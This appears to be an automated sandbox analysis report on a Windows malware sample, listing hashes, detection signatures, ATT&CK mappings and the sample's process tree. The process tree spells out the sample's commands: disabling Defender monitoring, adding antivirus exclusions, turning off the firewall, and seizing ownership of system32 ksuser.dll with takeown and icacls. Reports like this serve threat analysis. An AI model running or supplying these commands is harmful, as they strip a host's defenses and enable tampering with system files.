Analysis
-
max time kernel
141s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
05-11-2024 07:32
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
Resource
win10v2004-20241007-en
General
-
Target
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
-
Size
125KB
-
MD5
a293e528bd51b9d91da21e8cbfa8e5f5
-
SHA1
c82ecf0733270f0807cb86bad5e1c0126284fd62
-
SHA256
4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5
-
SHA512
9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020
-
SSDEEP
3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepid process 1592 powershell.exe 2668 powershell.exe 1620 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 2632 netsh.exe -
Possible privilege escalation attempt 14 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2728 icacls.exe 2044 icacls.exe 2720 icacls.exe 2708 takeown.exe 2820 takeown.exe 2516 icacls.exe 2584 icacls.exe 840 icacls.exe 672 icacls.exe 1632 icacls.exe 2560 icacls.exe 2576 icacls.exe 1932 icacls.exe 2260 icacls.exe -
Modifies file permissions 1 TTPs 14 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2584 icacls.exe 2044 icacls.exe 2708 takeown.exe 672 icacls.exe 2728 icacls.exe 840 icacls.exe 2720 icacls.exe 2260 icacls.exe 1632 icacls.exe 2820 takeown.exe 2560 icacls.exe 2576 icacls.exe 2516 icacls.exe 1932 icacls.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exedescription ioc process File created C:\Windows\SysWOW64\ksuser.dll SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe File opened for modification C:\Windows\SysWOW64\ksuser.dll SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe -
Drops file in Windows directory 1 IoCs
Processes:
Dism.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exepowershell.execmd.exenetsh.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.execmd.execmd.execmd.exeicacls.exeicacls.exeicacls.exeSecuriteInfo.com.Win32.MalwareX-gen.384.4440.execmd.exeDism.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dism.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1592 powershell.exe 1620 powershell.exe 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exetakeown.exetakeown.exeicacls.exeicacls.exedescription pid process Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeTakeOwnershipPrivilege 2820 takeown.exe Token: SeTakeOwnershipPrivilege 2708 takeown.exe Token: SeRestorePrivilege 2584 icacls.exe Token: SeRestorePrivilege 2720 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2324 wrote to memory of 1628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 1628 wrote to memory of 1592 1628 cmd.exe powershell.exe PID 1628 wrote to memory of 1592 1628 cmd.exe powershell.exe PID 1628 wrote to memory of 1592 1628 cmd.exe powershell.exe PID 1628 wrote to memory of 1592 1628 cmd.exe powershell.exe PID 2324 wrote to memory of 1000 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1000 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1000 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 1000 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 1000 wrote to memory of 1620 1000 cmd.exe powershell.exe PID 1000 wrote to memory of 1620 1000 cmd.exe powershell.exe PID 1000 wrote to memory of 1620 1000 cmd.exe powershell.exe PID 1000 wrote to memory of 1620 1000 cmd.exe powershell.exe PID 2324 wrote to memory of 2616 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2616 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2616 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2616 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2616 wrote to memory of 2668 2616 cmd.exe powershell.exe PID 2616 wrote to memory of 2668 2616 cmd.exe powershell.exe PID 2616 wrote to memory of 2668 2616 cmd.exe powershell.exe PID 2616 wrote to memory of 2668 2616 cmd.exe powershell.exe PID 2324 wrote to memory of 2316 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2316 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2316 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2316 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2316 wrote to memory of 2632 2316 cmd.exe netsh.exe PID 2316 wrote to memory of 2632 2316 cmd.exe netsh.exe PID 2316 wrote to memory of 2632 2316 cmd.exe netsh.exe PID 2316 wrote to memory of 2632 2316 cmd.exe netsh.exe PID 2324 wrote to memory of 2628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2324 wrote to memory of 2628 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe cmd.exe PID 2628 wrote to memory of 2656 2628 cmd.exe Dism.exe PID 2628 wrote to memory of 2656 2628 cmd.exe Dism.exe PID 2628 wrote to memory of 2656 2628 cmd.exe Dism.exe PID 2628 wrote to memory of 2656 2628 cmd.exe Dism.exe PID 2324 wrote to memory of 2820 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2820 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2820 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2820 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2708 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2708 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2708 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2708 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe takeown.exe PID 2324 wrote to memory of 2560 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2560 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2560 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2560 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2576 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2576 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2576 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2576 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2516 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2516 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2516 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2516 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2584 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2584 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2584 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe PID 2324 wrote to memory of 2584 2324 SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe"1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\Dism.exedism /Online /enable-feature /FeatureName:"DirectPlay" /All3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2656 -
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\system32\ksuser.dll" /A2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2820 -
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\system32\ksuser.dll"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2560 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2576 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2044 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser64.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:672 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2720 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2728 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2260 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1632
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56617a2f11084bb9893c3ab1b4bd073eb
SHA10090c4dade877b98a5df88389d7132e420155594
SHA256b6a591da0da6d461559d478e474ea6b4884e97eb4bf5b1db59718c052527ce5d
SHA512c96e5dcce3b8897d7102d86e274d30b4982fd2cb3fdfb0d13a4e8664ac7ebe82dccae37b7996376a3f19f5f6d10cc66957f0258d178526620e459f29dca6490e
-
Filesize
118KB
MD5d5f3ecad923278e96bbbb6796f0bbca5
SHA19c54ba7de2d02306e3fcfa949163f10086c3ca3b
SHA256447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807
SHA5129c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a